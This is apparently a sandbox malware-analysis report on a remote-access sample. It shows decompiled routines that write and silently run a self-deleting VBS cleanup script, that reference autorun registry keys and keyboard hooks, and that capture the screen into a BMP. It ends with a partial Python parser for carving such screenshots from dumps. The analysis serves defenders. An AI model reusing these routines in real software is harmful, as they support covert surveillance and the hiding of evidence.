                                        				__imp___wgetenv(L"Temp", _t138, L"\\update.vbs");
                                        				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(_t138);
                                        				L00414146();
                                        				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ( &_v92, _t138);
                                        				_t140 =  &_v10;
                                        				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(L"Set fso = CreateObject(\"Scripting.FileSystemObject\")\n", _t140);
                                        				L0041416A();
                                        				_t308 = _t306 + 0x18;
                                        				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ( &_v44, L"On Error Resume Next\n", _t140);
                                        				if(_v9 != 0) {
                                        					_t157 =  &_v644;
                                        					__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(_t157,  &_v10, L"\")\n");
                                        					_t158 =  &_v76;
                                        					L0041416A();
                                        					_t159 =  &_v28;
                                        					L00414146();
                                        					_t308 = _t308 + 0x18;
                                        					__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t159, _t159, _t158, _t158, L"while fso.FileExists(\"", _t157);
                                        					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                        					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                        					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                        				}
                                        				_t285 = L"\"\n";
                                        				_t143 =  &_v10;
                                        				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(L"fso.DeleteFile \"", _t143,  &_v644, _t285);
                                        				_t144 =  &_v76;
                                        				L00414146();
                                        				_t145 =  &_v60;
                                        				L00414146();
                                        				_t310 = _t308 + 0x18;
                                        				__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t145, _t145, _t144, _t144, _t143);
                                        				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                        				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                        				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                        				if(_v9 != 0) {
                                        					__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z(L"wend\n");
                                        				}
                                        				__imp__??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z(0x41bc68, 0x415800);
                                        				if(_t145 != 0) {
                                        					_t154 =  &_v76;
                                        					L0041416A();
                                        					_t155 =  &_v60;
                                        					L00414146();
                                        					_t310 = _t310 + 0x18;
                                        					__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t155, _t155, _t154, _t154, L"fso.DeleteFolder \"", 0x41bc68, _t285);
                                        					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                        					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                        				}
                                        				_t146 =  &_v10;
                                        				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(L"\"\"\", 0", _t146, "\n");
                                        				_t148 =  &_v9;
                                        				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(L"CreateObject(\"WScript.Shell\").Run \"cmd /c \"\"", _t148,  &_v0, _t146);
                                        				_t149 =  &_v28;
                                        				L0041414C();
                                        				_t150 =  &_v76;
                                        				L0041414C();
                                        				_t151 =  &_v60;
                                        				L00414146();
                                        				__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t151, _t151, _t150, _t150, _t149, _t149, _t148);
                                        				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                        				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                        				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                        				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                        				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                        				__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z(L"fso.DeleteFile(Wscript.ScriptFullName)");
                                        				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                        				__imp__?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ();
                                        				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                        				_t153 = E00412D56( &_v44, _t151 << 1, _t151 << 1, _t151, 0);
                                        				if(_t153 != 0) {
                                        					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                        					_t153 = ShellExecuteW(0, L"open", _t153, 0x415800, 0x415800, 0);
                                        					if(_t153 > 0x20) {
                                        						exit(0);
                                        					}
                                        				}
                                        				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                        				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                        				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                        				return _t153;
                                        			}

                                        APIs
                                          • Part of subcall function 0040AC8C: TerminateProcess.KERNEL32(00000000,00000000,004085BA), ref: 0040AC9C
                                          • Part of subcall function 0040AC8C: WaitForSingleObject.KERNEL32(000000FF), ref: 0040ACAF
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 00408282
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(0041BA38,80000001,004166F0), ref: 004082AC
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(0041BA38,80000001,004166F0), ref: 004082C8
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(0041BA38,80000001,004166F0), ref: 004082E8
                                        • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BA38,80000001,004166F0), ref: 00408321
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040832A
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(exepath,00000000,00000208,00000000), ref: 0040834A
                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 00408368
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00408370
                                        • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 00408378
                                        • ??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(0041BC68,00415800), ref: 00408394
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000080), ref: 004083A6
                                        • SetFileAttributesW.KERNEL32(00000000), ref: 004083AD
                                        • SetFileAttributesW.KERNEL32(?,00000080), ref: 004083BF
                                          • Part of subcall function 00406D41: TerminateThread.KERNEL32(Function_0000528A,00000000,00000004,0041B310,004085CD), ref: 00406D56
                                          • Part of subcall function 00406D41: UnhookWindowsHookEx.USER32(00000000), ref: 00406D5F
                                          • Part of subcall function 00406D41: TerminateThread.KERNEL32(Function_0000526A,00000000), ref: 00406D6F
                                        • _wgetenv.MSVCRT ref: 004083DA
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000), ref: 004083E5
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 004083F0
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004083FB
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(Set fso = CreateObject("Scripting.FileSystemObject"),?), ref: 0040840D
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,On Error Resume Next,00000000), ref: 0040841D
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408428
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,")), ref: 00408447
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,while fso.FileExists(",00000000), ref: 00408457
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00408464
                                        • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00408470
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408479
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408482
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040848B
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(fso.DeleteFile ",?,?,00416354), ref: 004084A9
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 004084B4
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 004084C1
                                        • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004084CD
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004084D6
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004084DF
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004084E8
                                        • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(wend), ref: 004084FC
                                        • ??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(0041BC68,00415800), ref: 00408504
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,fso.DeleteFolder ",0041BC68,00416354), ref: 0040851B
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,?,?,00416354), ref: 00408528
                                        • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,00416354), ref: 00408534
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00416354), ref: 0040853D
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00416354), ref: 00408546
                                        • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(fso.DeleteFile(Wscript.ScriptFullName)), ref: 00408554
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00408560
                                        • ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 0040856A
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00408576
                                          • Part of subcall function 00412D56: CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000080,00000000,00000000,0041623C), ref: 00412D93
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00415800,00415800,00000000), ref: 0040858F
                                        • ShellExecuteW.SHELL32(00000000,open,00000000), ref: 0040859C
                                        • exit.MSVCRT ref: 004085A3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$G@std@@$G@2@@std@@$?c_str@?$basic_string@$??1?$basic_string@G@2@@0@V?$basic_string@$Hstd@@$V01@V10@Y?$basic_string@$??0?$basic_string@D@2@@std@@D@std@@FileG@1@@$TerminateV01@@V10@@$??9std@@AttributesThread$?length@?$basic_string@?size@?$basic_string@CreateDeleteExecuteHookModuleNameObjectProcessShellSingleUnhookWaitWindows_wgetenvexit
                                        • String ID: ")$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\uninstall.vbs$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                        • API String ID: 4026913539-546584676
                                        • Opcode ID: 59506b7e516daa9a8832ce67ad3f8ab0b3f2a32270095ed8dd065a46b6e6b17a
                                        • Instruction ID: 4759749fa9a93480e8798f104ff06792d31013b0e42c9834499dc68fb1b0d0e4
                                        • Opcode Fuzzy Hash: 59506b7e516daa9a8832ce67ad3f8ab0b3f2a32270095ed8dd065a46b6e6b17a
                                        • Instruction Fuzzy Hash: FA917172900509BBDB00EBE0ED4DAEE777CEF94305F14806AF902A2191DF795E44CBA9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 62%
                                        			E0040FA46(void* __eflags, intOrPtr _a4, signed int _a8, char _a11, signed int _a12) {
                                        				struct HDC__* _v8;
                                        				void* _v12;
                                        				struct HDC__* _v16;
                                        				int _v20;
                                        				int _v24;
                                        				int _v28;
                                        				char _v44;
                                        				intOrPtr _v50;
                                        				void* _v52;
                                        				void* _v54;
                                        				intOrPtr _v58;
                                        				char _v60;
                                        				char _v76;
                                        				intOrPtr _v80;
                                        				struct tagCURSORINFO _v96;
                                        				signed int _v102;
                                        				signed int _v104;
                                        				long _v112;
                                        				long _v116;
                                        				char _v120;
                                        				struct _ICONINFO _v140;
                                        				int _t143;
                                        				void* _t144;
                                        				signed int _t153;
                                        				long _t164;
                                        				void* _t165;
                                        				char* _t189;
                                        				signed int _t193;
                                        				void* _t214;
                                        				signed int _t222;
                                        				signed char _t224;
                                        				signed int _t225;
                                        				signed int _t242;
                                        				struct HDC__* _t245;
                                        				int _t249;
                                        				struct tagBITMAPINFO* _t250;
                                        
                                        				_t214 = 0;
                                        				_t245 = CreateDCA("DISPLAY", 0, 0, 0);
                                        				_v16 = _t245;
                                        				_v8 = CreateCompatibleDC(_t245);
                                        				_t248 = 0x41bfc8 + _a12 * 4;
                                        				_v12 = E0040FECE( *((intOrPtr*)(0x41bfc8 + _a12 * 4)));
                                        				_t143 = E0040FF18( *(0x41bfc8 + _a12 * 4));
                                        				_v28 = _t143;
                                        				if(_v12 != 0 || _t143 != 0) {
                                        					_t144 = CreateCompatibleBitmap(_t245, _v12, _t143);
                                        					_a12 = _t144;
                                        					if(_t144 != _t214) {
                                        						if(SelectObject(_v8, _t144) != 0) {
                                        							_v24 = _t214;
                                        							asm("stosd");
                                        							E0040FF57( *_t248,  &_v24);
                                        							if(StretchBlt(_v8, _t214, _t214, _v12, _v28, _v16, _v24, _v20, _v12, _v28, 0xcc0020) != 0) {
                                        								if(_a8 != 0) {
                                        									_v96.cbSize = 0x14;
                                        									if(GetCursorInfo( &_v96) != 0 && GetIconInfo(_v96.hCursor,  &_v140) != 0) {
                                        										DeleteObject(_v140.hbmColor);
                                        										DeleteObject(_v140.hbmMask);
                                        										DrawIcon(_v8, _v96.ptScreenPos - _v140.xHotspot - _v24, _v80 - _v140.yHotspot - _v20, _v96.hCursor);
                                        										_t214 = 0;
                                        									}
                                        								}
                                        								_push( &_v120);
                                        								_t249 = 0x18;
                                        								if(GetObjectA(_a12, _t249, ??) != 0) {
                                        									_t153 = _v102 * _v104;
                                        									_t242 = 1;
                                        									if(_t153 != _t242) {
                                        										_t222 = 4;
                                        										if(_t153 > _t222) {
                                        											_t222 = 8;
                                        											if(_t153 <= _t222) {
                                        												goto L18;
                                        											}
                                        											_t222 = 0x10;
                                        											if(_t153 <= _t222) {
                                        												goto L18;
                                        											}
                                        											if(_t153 > _t249) {
                                        												_a8 = 0x20;
                                        												L28:
                                        												_push(0x28 + (_t242 << _a8) * 4);
                                        												L23:
                                        												_t250 = LocalAlloc(0x40, ??);
                                        												_t224 = _a8;
                                        												_t250->bmiHeader = 0x28;
                                        												_t250->bmiHeader.biWidth = _v116;
                                        												_t250->bmiHeader.biHeight = _v112;
                                        												_t250->bmiHeader.biPlanes = _v104;
                                        												_t250->bmiHeader.biBitCount = _v102;
                                        												if(_t224 < 0x18) {
                                        													_t193 = 1;
                                        													_t250->bmiHeader.biClrUsed = _t193 << _t224;
                                        												}
                                        												_t225 = 8;
                                        												asm("cdq");
                                        												_t250->bmiHeader.biCompression = _t214;
                                        												_t250->bmiHeader.biClrImportant = _t214;
                                        												_t164 = (_t250->bmiHeader.biWidth + 7) / _t225 * (_a8 & 0x0000ffff) * _t250->bmiHeader.biHeight;
                                        												_t250->bmiHeader.biSizeImage = _t164;
                                        												_t165 = GlobalAlloc(_t214, _t164);
                                        												_v12 = _t165;
                                        												if(_t165 != _t214) {
                                        													if(GetDIBits(_v8, _a12, _t214, _t250->bmiHeader.biHeight & 0x0000ffff, _t165, _t250, _t214) != 0) {
                                        														_v60 = 0x4d42;
                                        														_v54 = _t214;
                                        														_v52 = _t214;
                                        														_v58 = _t250->bmiHeader.biSizeImage + _t250->bmiHeader.biClrUsed * 4 + _t250->bmiHeader + 0xe;
                                        														_v50 = _t250->bmiHeader + 0xe + _t250->bmiHeader.biClrUsed * 4;
                                        														__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z( &_a11);
                                        														__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z( &_a11);
                                        														__imp__?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z( &_v60, 0xe);
                                        														__imp__??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z( &_v44);
                                        														__imp__?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z(_t250, 0x28);
                                        														__imp__??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z( &_v44);
                                        														__imp__?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z(_v12, _t250->bmiHeader.biSizeImage);
                                        														__imp__??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z( &_v44);
                                        														DeleteObject(_a12);
                                        														GlobalFree(_v12);
                                        														DeleteDC(_v16);
                                        														DeleteDC(_v8);
                                        														__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z( &_v76);
                                        														__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                        														__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                        														goto L33;
                                        													}
                                        													DeleteDC(_v16);
                                        													DeleteDC(_v8);
                                        													DeleteObject(_a12);
                                        													GlobalFree(_v12);
                                        													_t189 =  &_a11;
                                        												} else {
                                        													DeleteDC(_v16);
                                        													DeleteDC(_v8);
                                        													DeleteObject(_a12);
                                        													_t189 =  &_a11;
                                        												}
                                        												goto L31;
                                        											}
                                        											_a8 = _t249;
                                        											_push(0x28);
                                        											goto L23;
                                        										}
                                        										L18:
                                        										_a8 = _t222;
                                        										goto L28;
                                        									}
                                        									_a8 = _t242;
                                        									goto L28;
                                        								} else {
                                        									DeleteDC(_v16);
                                        									DeleteDC(_v8);
                                        									DeleteObject(_a12);
                                        									_t189 =  &_a11;
                                        									goto L31;
                                        								}
                                        							}
                                        							DeleteDC(_v16);
                                        							DeleteDC(_v8);
                                        							DeleteObject(_a12);
                                        							_t189 =  &_a11;
                                        							goto L31;
                                        						}
                                        						DeleteDC(_t245);
                                        						DeleteDC(_v8);
                                        						DeleteObject(_a12);
                                        						_t189 =  &_a11;
                                        						goto L31;
                                        					}
                                        					DeleteDC(_t245);
                                        					DeleteDC(_v8);
                                        					DeleteObject(_t214);
                                        					_t189 =  &_a11;
                                        					goto L31;
                                        				} else {
                                        					_t189 =  &_a11;
                                        					L31:
                                        					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z(0x415664, _t189);
                                        					L33:
                                        					return _a4;
                                        				}
                                        			}

                                        APIs
                                        • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 0040FA5C
                                        • CreateCompatibleDC.GDI32(00000000), ref: 0040FA68
                                          • Part of subcall function 0040FECE: GetMonitorInfoW.USER32(?,?), ref: 0040FEEE
                                          • Part of subcall function 0040FF18: GetMonitorInfoW.USER32(0040FA91,?), ref: 0040FF38
                                        • CreateCompatibleBitmap.GDI32(00000000,?,00000000), ref: 0040FAAC
                                        • DeleteDC.GDI32(00000000), ref: 0040FAC0
                                        • DeleteDC.GDI32(00000000), ref: 0040FAC5
                                        • DeleteObject.GDI32(00000000), ref: 0040FAC8
                                        • SelectObject.GDI32(00000000,00000000), ref: 0040FADA
                                        • DeleteDC.GDI32(00000000), ref: 0040FAEB
                                        • DeleteDC.GDI32(00000000), ref: 0040FAF0
                                        • DeleteObject.GDI32(00410983), ref: 0040FAF5
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 0040FD20
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040FD5E
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040FD6B
                                        • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z.MSVCP60(00004D42,0000000E), ref: 0040FD7A
                                        • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 0040FD87
                                        • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z.MSVCP60(00000000,00000028), ref: 0040FD93
                                        • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 0040FDA0
                                        • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z.MSVCP60(?,?), ref: 0040FDAF
                                        • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 0040FDBC
                                        • DeleteObject.GDI32(00410983), ref: 0040FDC5
                                        • GlobalFree.KERNEL32 ref: 0040FDCA
                                        • DeleteDC.GDI32(00000000), ref: 0040FDD9
                                        • DeleteDC.GDI32(00000000), ref: 0040FDDE
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040FDE7
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040FDF0
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040FDF9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$Delete$??0?$basic_string@ObjectV01@@$?assign@?$basic_string@CreateD@1@@V01@V12@Y?$basic_string@$??1?$basic_string@CompatibleInfoMonitor$BitmapFreeGlobalSelect
                                        • String ID: $BM$DISPLAY
                                        • API String ID: 585525397-871886180
                                        • Opcode ID: 876bd925b7c2d7ba203db6ddd87036fd97f3491858af2704dd42dcb20a0039ab
                                        • Instruction ID: 6bc9ab2a81804b36ace2e86e9fd4fad5708e5c5067481f6dd5077a8177631ab2
                                        • Opcode Fuzzy Hash: 876bd925b7c2d7ba203db6ddd87036fd97f3491858af2704dd42dcb20a0039ab
                                        • Instruction Fuzzy Hash: 17C1E37190020DEFDF209FA0DC849DEBBB9FF48314F10843AE915A62A0D735AA59DF54
                                        Uniqueness

                                        Uniqueness Score: -1.00%
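The call listing above is a screen grab: a DC on "DISPLAY", a compatible DC and bitmap, GetMonitorInfoW for the geometry, then three std::string::assign calls that glue together the "BM" file header (0xE bytes), a 0x28-byte BITMAPINFOHEADER and the pixel bits. What an analyst usually wants from that is a parser that recognises exactly those three pieces, so that screenshots can be carved out of a memory dump or a reassembled C2 stream. The following Python is an added example, not code from the report, the sandbox or the sample; build_bmp only fabricates constructed test input, and the BI_RGB-only check is an assumption about uncompressed GDI captures rather than something the listing proves.

```python
import struct

BMP_MAGIC = b"BM"
FILE_HEADER_LEN = 14   # BITMAPFILEHEADER: the 0xE-byte assign() after "BM"
INFO_HEADER_LEN = 40   # BITMAPINFOHEADER: the 0x28-byte assign()
FILE_HDR_FMT = "<2sIHHI"        # bfType, bfSize, bfReserved1, bfReserved2, bfOffBits
INFO_HDR_FMT = "<IiiHHIIiiII"   # biSize, biWidth, biHeight, biPlanes, biBitCount,
                                # biCompression, biSizeImage, biXPelsPerMeter,
                                # biYPelsPerMeter, biClrUsed, biClrImportant


def row_stride(width, bpp):
    """BMP pixel rows are padded to a 4-byte boundary."""
    return (abs(width) * bpp // 8 + 3) & ~3


def build_bmp(width, height, bpp=24):
    """Constructed test input: an all-zero bottom-up BMP laid out like the
    capture routine's string (file header + info header + bits)."""
    bits = bytes(row_stride(width, bpp) * abs(height))
    off_bits = FILE_HEADER_LEN + INFO_HEADER_LEN
    file_hdr = struct.pack(FILE_HDR_FMT, BMP_MAGIC, off_bits + len(bits), 0, 0, off_bits)
    info_hdr = struct.pack(INFO_HDR_FMT, INFO_HEADER_LEN, width, height, 1, bpp,
                           0, len(bits), 2835, 2835, 0, 0)
    return file_hdr + info_hdr + bits


def parse_bmp(blob):
    """Validate a blob made of the three pieces above and return its geometry.
    Raises ValueError for anything that is not a complete BM / 40-byte-header image."""
    if len(blob) < FILE_HEADER_LEN + INFO_HEADER_LEN:
        raise ValueError("too short for file header + BITMAPINFOHEADER")
    magic, file_size, _, _, off_bits = struct.unpack_from(FILE_HDR_FMT, blob, 0)
    if magic != BMP_MAGIC:
        raise ValueError("missing BM magic")
    (hdr_size, width, height, planes, bpp, compression, _size_image,
     _xppm, _yppm, _clr_used, _clr_imp) = struct.unpack_from(INFO_HDR_FMT, blob, FILE_HEADER_LEN)
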